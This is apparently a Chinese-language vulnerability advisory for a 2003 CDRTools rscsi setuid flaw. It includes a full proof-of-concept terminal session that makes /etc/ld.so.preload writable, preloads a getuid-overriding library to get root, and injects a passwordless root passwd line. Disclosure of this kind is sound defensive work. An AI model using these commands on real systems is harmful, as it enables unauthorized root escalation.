CDRTools RSCSI Debug破坏任意本地文件漏洞
发布日期:2003-08-01
更新日期:2003-08-06
受影响系统:CDRTools CDRTools 2.0.3
CDRTools CDRTools 2.0
不受影响系统:CDRTools CDRTools 2.01a18
描述:
BUGTRAQ ID:
8328
Cdrecord刻录程序支持大部分DVD-RW设备。
Cdrecord包含的rscsi程序可破坏攻击者指定文件的组属性,本地攻击者可以利用这个漏洞进行权限提升。
rscsi程序默认以setuid root权限安装,此程序可以修改和破坏文件的属组,因此攻击者可以调用这个程序对本地系统进行拒绝服务或获得root用户权限。
<*来源:Strategic Reconnaissance Team (
research@secnetops.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Strategic Reconnaissance Team (
research@secnetops.com)提供了如下测试方法:
$ echo C`echo -e
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` |
/opt/schily/sbin/rscsi /tmp/lala
[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ ls -al oops.so
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
E0
Garbage command
0
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
建议:
厂商补丁:
CDRTools
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
cdrtools Upgrade cdrtools 2.01a18 (Development)
http://freshmeat.net/releases/131136/浏览次数:2815
严重程度:0(网友投票)